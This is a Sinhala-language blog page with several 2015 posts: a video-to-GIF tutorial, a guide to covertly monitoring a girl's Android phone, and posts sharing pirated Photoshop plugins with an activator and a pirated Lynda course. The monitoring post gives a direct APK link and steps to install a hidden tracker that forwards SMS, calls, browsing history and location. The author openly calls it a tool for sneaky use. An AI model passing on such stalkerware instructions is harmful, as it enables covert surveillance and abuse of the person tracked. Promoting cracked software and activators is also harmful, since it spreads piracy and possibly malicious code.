Sunday, November 22, 2015

GIF හදල බැනුම් අහමු

ඔන්න උදේ පාන්දර ආවා ත්‍රෙඩ් එකක් දාල යන්න.....
අද ටිකක් වෙනස් එක....
හැමජාතියකම වේගේ ත්‍රෙඩ් දාල තියන නිසා හැමදාම වෙනස් ඒවා තමා...
ඉතින් මොකක්ද අද කරන්න යන්නේ?
අද අපි යන්නේ ගිෆ් (gif) හදන්න....
මිට කලින් ගියා අපිට මොනවා හරි අකුරු ටිකක් ගිෆ් එකක් කරන හැටි,
අද මම කරන්න යන්නේ මොකක් හරි වීඩියෝ එකක් ගිෆ් එකක් කරන හැටි....


මමත් හිතුවා ඔයාලට මේක කියන්න කියලා....
මේක කෙලින්ම කොපි කරලා දාන්නේ නැතුව මගේ වචන වලින්, මගේ snap shot වලින් දාන්න ඕනේ කියලා හිතුවා.....







ඉතින් අද ඉදන් ඔයාලා හැමෝටම මේ වගේ ඒවා හදන්න පුළුවන්......

එහෙනම් පටාන් ගමු....
අපි මේකට යොදා ගන්නේ video-gif-converter කියන software එක....
එක මෙතනින් ගන්න......
http://www.video-gif-converter.com/download.html

දැන් ඉතින් වෙන ඒවා වගේම මේක ඉන්ස්ටෝල් කර ගන්න....
මේවා හොර කොපි නෙමෙයි,
නිකන් දෙන ඒවා....
ඒ නිසා බය වෙන්න දෙයක් නැ.....

දැන් software එක මෙහෙම ඔපෙන් වෙයි...



මුලින්ම කරන්න ඕනේ අපිට convert කරන්න ඕනේ ෆයිල් එක තෝරන්න.....
එක මම කහ පාටින් පෙන්වල තියෙන තැනින් එකතු කර ගන්න.....

දැන් යටින් ඔයාලට පෙන්වයි ඒ ෆයිල් එකේ play time එකයි, සයිස් එකයි....

ඊළගට කරන්න තියෙන්නේ අපිට ගිෆ් එකක් විදිහට convert කරන්න ඕනේ කොටස තෝරන්න ඕනේ....
මේකේ මම තෝරලා තියෙන්නේ තත්පර 3 ඉදලා 15 වෙනකල් කොටස......

ඊළගට අපිට ගිෆ් ෆයිල් එකේ සයිස් එක හදන්න පුළුවන්....
සාමාන්‍යයෙන් මේ දීල තියෙන සයිස් එකට 300KB සයිස් එකක් හදාගන්න පුළුවන්...
එළකිරි එකට දාන්න නම් මේ සයිස් ඒවා හදමු...
නැත්නම් මම අර කලින් කිව වගේ ස්ලෝව් වෙනවා කියල කස්ටියගෙන් බැනුම් () අහන්න වෙනවා සුවර්.......

දැන් තියෙන්නේ මේ ෆයිල් එක කඩා ගන්න ඕනේ ෆොටෝ ගාන දෙන්න.....
මම දීල තියෙන්නේ තත්පර එකකට ෆොටෝ 10ක් කැඩෙන්න කියලා....
එක තමන්ට ඕනේ ෆොටෝ කොලිටි එක අනුව තීරණය කරන්න....

දැන් මුල ටික ඉවරයි ඔන්.....
දැන් තියෙන්නේ කඩා ගත්ත එකෙන් ගිෆ් ෆයිල් එක හදන්න....



මුලින්ම පෙන්වනවා අපිට තියෙන මුළු frame එහෙම නැත්නම් පොටෝ ගාන..
අපිට මේ පොටෝ එක එක බලන්න පුළුවන්....
ඒ කරලා අනවශ්‍ය ඒවා තියෙනවා නම් අයින් කරන්න පුළුවන්....
ඒ විදිහට පොටො ටික බබා වගේ හදා ගන්න.....

දැන් තියෙන්නේ quality එක තෝරන්න....
අයෙත් කියන්නේ එළකිරි එකේ දාන්න නම් normal තෝරන්න...
ඊට පස්සේ play speed එක...
අපිට ඕනේ නම් video එකේ speed එකම තෝරන්න පුළුවන්.
නැත්නම් අපිට පුළුවන් ගානක් තෝරන්න පුළුවන්....

ගිෆ් එක play වෙන speed එක = ( video එක තත්පරයට කඩපු frame ගාන)/(දැන් play වෙන්න දුන්නු speed එක....)

ඒ කියන්නේ අපි video එක තත්පරයට frame 10කත කඩලා , තත්පරයට frame 12 ගානේ play වෙන්න දුන්නොත් video එකේ speed එක කලින් වගේ 1.2ක් වෙනවා......

දැන් ඉතින් දෙවියනේ කියල save කර ගන්න....

හැබැයි මේ software එකේ පොඩි අවුලක් තියෙනවා....
ඒ තමා හදපු එකක් ආපහු බලා ගන්න බැ,
එකටත් මම වෙනම එකක් දෙන්නම්....

http://en.kioskea.net/download/download-9815-gif-viewer

මේක පොඩි එකක්,,,
පටස් ගාල ඉන්ස්ටල් කර ගන්න...
මේකෙන් පුළුවන් ඕනේ ගිෆ් එකක් play කරවන්න....

ඔන්න එහෙනම් මගේ වැඩ ඉවරයි....

කෙල්ලගේ 4න් එකේ sms ඔක්කොම බලන හැටි

ඉස්සල්ලම කියන්න ඕන repost ද දන්නැහැ. එහෙමනම් සොරි වෙන්න ඕන.
මේකෙන් අපිට පුළුවන් android 4න් එකක 
sms
mms
call history
browsing history
system activities
location


කියන ඔක්කොම track කරගන්න........

හරි කරන්න තියන්නේ මෙහෙමයි.
මේ ලින්ක් එකේ තියන app එක ඩවුන්ලෝඩ් කරගන්න.
ඊට පස්සේ install කරද්දී මතක ඇතුව data ඕන කරලා අලුතෙන් අකවුන්ට් එකක් හදන්න.
ලොකු දෙයක් කරන්න නැහැ username එකකුයි password එකයි
email address එකයි දෙන්න තියන්නේ.

ඊට පස්සේ app එක 4න් එකේ තියනවද කියලවත් හොයාගන්න බැහැ. icon එකක් home screen එකේ පෙන්නන්නේ නැහැ. (හොර වැඩකට කියාපු බාන්ඩ්.) 
අපේ කට්ටිය ඉතින් හොයා හොයනේ ඉන්නේ හොර වැඩක් කරගන්න පුළුවන් දෙයක්.

හරි දැන් app එක install කරගත්තනේ. ඊට පස්සේ මොනිටර් කරගන්න යන්න වෙනවා අපි app 
එක install කරද්දී දුන්න email address එකට. එකට ගිහින් verify කරලා ඒ තියන link එකෙන් log වෙන්න කලින් දීපු username එකයි password එකයි දාල. 




ඔන්න try කරලා බලන්න.
http://smstracker.com/downloads/SystemHealth3178.apk

ෆොටෝ ෂොප් වලින් එළකිරි වගේ එඩිට් කරමු..

ආයුබෝවන්ඩ ඔක්කොමලට කාලෙකින් නූල් කෑල්ලක් දාන්න බැරි උන නිසා මොකද්ද දාන්නෙ කියලා කල්පනා කර කර අන්තර් දැලේ කරක් ගහ ගහ ඉන්න කොට හම්බ උනා කියහල්ලකෝ එළ භාණ්ඩයක්..භාණ්ඩයක් කිව්වට පට්ට පතුරු පදිරි භාණ්ඩ ලොට් එකක්.තනියම කනවට වඩා බෙදන් හදන් කනඑක හොඳ නිසා මමත් ඔන්න මෙහාට ගෙනාවා ඒක.මොකද්ද දන්නවද Photo shop Plugins සෙට් එකක්..මේකෙන් කරගන්න පුළුවන් දේවල් නම් අසීමිතයි වගේ..ගොඩක් ලොකු වටිනාකමක් නම් අනිවා ඇති ..ඒත් ඉතින් අපිය මේවා සල්ලි දීලා ගන්නෙ කොහොමද නේ..ඉඩමක් වත් විකුණන්න වෙනවා මේ ටික සල්ලි දීලා ගන්න..ඇති දැන් උඹ ගෙ පුරජේරුව නවත්තලා කියහන් මේක ගැන නේ..කව්රුත් එහෙම නොකිව්වට ඔක්කොමලා එහෙම හිතුවා නේ..මෙන්න මේ Photo shop Plugins සෙටි එක තමයි තියෙන්නේ.. 



Analog Efex Pro 2.12.12
Color Efex Pro 4.3.24.12
Dfine 2.2.21.12
HDR Efex Pro 2.2.24.12
Sharpener Pro 3.1.21.12
Silver Efex Pro 2.2.24.12
Viveza 2.1.21.12



මේ තියෙන්නේ Color Efex Pro 4 සොෆ්ට් එක 

බය නැතිව ඩවුන් කර ගන්න ..මම නම් දා ගත්තා..ඇක්ටිවේටරේකුත් එක්ක තමයි තියෙන්නේ..පහලින් දාන්නහම් ලින්ක් එක..ඩිරෙක්ට් ලින්ක් නම් නෑ ටොරන්ට් තමයි ඉතින්


මෙන්න මෙතන කොටපියව් ඩවුන් කරගන්න..කෙලින්ම මැග්නට් ලින්ක් තමා

අමතක උනා කියන්න 430MB තියනවා මේකෙ..

Photo shop Plugins සෙට් එකේ ෆුල් ටියුටෝරියල් වීඩියෝ එකකුත් ඔන්න ගෙනාවා



පොඩි විස්තර ටිකකුත් ගේන්නම් මම

Analog Efex Pro 2 ගැන කිව්වොත් පරන ක්‍රම වල පොටෝස් වලට කැමති අයට මේක ගොඩක් වැදගත් වෙයි.පරන කිව්වට පරනම ඒවා විතරක් නෙවී.




Color Efex Pro 4 ගැන කිව්වොත් නම් පිටු ගානක් ලියන්න වෙයි මට මේකෙ..එක නිසා ඒකෙන් වැඩ දාපු පින්තූර 2ක් 3ක් දාන්නම්..



තේරුනා නේ ඒක ගැන..

ඊට පස්සෙ කියන්න තියෙන්නේ Dfine 2 ගැන තමයි..



පින්තූරෙ දැක්කම තේරුනා නේ මොකක්ද එකෙන් වෙන්නේ කියලා..

Viveza 2



HDR Efex Pro 2



Silver Efex Pro 2


මේක නම් ඉතින් කළු සුදු වලට කැමති අයට තමයි

කියන්න අමතක උනා මේකෙ දීලා තියන ඇක්ටිවේටර් එක ඩබල් ක්ලික් කලාට මොකුත් වෙන්නෙ නැහැ.. සෙටප් එක ලෝඩ් වෙලා නැතිවෙලා යනවා .එහෙම උනා කියලා බය වෙන්න එපා PLUGINS ටික ඇක්ටිවේට් වෙනවා..

ඔක්කොම ගැන කියන්න ලියන්න කම්මැලියි අප්පා..එහෙනම් මේක බාලා ඒක පාවිචිච් කරලා හදපු පින්තූර 2ක 3ක් දාන්න බලන්න මේකේ..ඕන් එහෙනම් අපි ගියා

Thursday, November 5, 2015

Photoshop ඉගෙන ගන්න මෙන්න නියම Tutorial Pack එකක්



ඔන්න මචන්ලා අද අරගෙන ආවා සුපිරි Photoshop Video Tutorial Pack එකක්. නෙට් එකේ සැරිසරද්දි තමා හම්බ උණේ. Adobe Photoshop කියද්දි කවුරුත් දන්නවනේ Photo edit කරන්න පාවිච්චි කරන හොදම මෘදුකාංගයක්.කියලා. Photoshop ඉගෙන ගන්න තියෙන හොදම වෙබ් සයිට් එක තමයී Lynda.com කියන්නේ. ඉතින් මට හම්බ උණා මේLynda.com එකේ Photoshop CC Essential Training Video (2015) Tutorial Pack එකක්. ඉතින් ඔන්න Photoshop ඉගෙන ගන්න කැමති අයට ගන්න දානවා. මේකේ මුල ඉදන්ම වැඩ කරගන්න හැටි කියලා දෙනවා. පොඩි පොඩි Video කෑලි 145 ක් තියනවා. විඩියෝ කොලිටි එක ගැන කියනවනම් 1280 x 720 වලිනුයි තියෙන්නේ. Download Link එකට නම් තියෙන්නේ Mega Link එකක්. මේ Mega Link ලේසියෙන්ම Download කරගන්න පුලුවන් පොඩි සොෆ්ට්වෙයා කෑල්ලකුත් දෙන්නම්. ඒක හරහා Videos ටික Download කරගන්න.

■ Video කෑලි 145 සයිස් එක 1.9 GB
■ Exercise Fille.zip එකක් තියනවා ඒක 1.5 GB



Lynda – Photoshop CC Essential Training (2015)

හරි මෙතනින් Photoshop CC Essential Training Video Tutorial Pack එක Download කරගන්න. ( Mega Link )




Mega Link ලේසියෙන්ම Download කරගන්න පුලුවන් පොඩි සොෆ්ට්වෙයා කෑල්ලක් තියනවා " MEGA Link Downloader " කියලා. ඒක මෙතනින් Download කරගන්න. ( 1.2 MB )



Requirement:
- .NET Framework 4.0 or .NET Framework 4.5
- XP/Vista/7/8.1

මෙන්න Download Link එකේ Preview එකක්.



මෙන්න මේවා ගැන තමයි මේකෙන් කියලා දෙන්නේ.

Topics include:

■ Customizing Photoshop’s interface
■ Resizing and resampling images
■ Comparing raw and JPEG files
■ An overview of Camera Raw
■ Cropping and straightening
■ Working with layers
■ Transforming, distorting, and warping
■ Taking advantage of Smart Objects
■ Working with layer masks and blend modes
■ Making selections
■ Adding adjustment layers
■ Retouching portraits, including skin, teeth, hair, and eyes
■ Combining multiple images
■ Working with filters
■ Creating character, paragraph, and type along a path
■ Shape layers and layer effects
■ Painting in Photoshop
■ Creating time-lapse videos and animated GIFs
■ Working with video
■ Sharing images





මෙහෙමයි MEGA Link Downloader එක හරහා Download කරගන්නේ.

සාමාන්‍ය විදිහටම Install කරගෙන Launch කරගෙන Setting ක්ලික් කරලා Download Directory එක දෙන්න.





ඊට පස්සේ " Add Link " ක්ලික් කරලා Mega Download Link එක දෙන්න.



අවශ්‍ය නම් ඔක්කොම ටික හරි තෝරා ගත් කිහිපයක් උනත් ගන්න පුලුවන්.



 
Design by Wordpress Theme | Bloggerized by Free Blogger Templates | coupon codes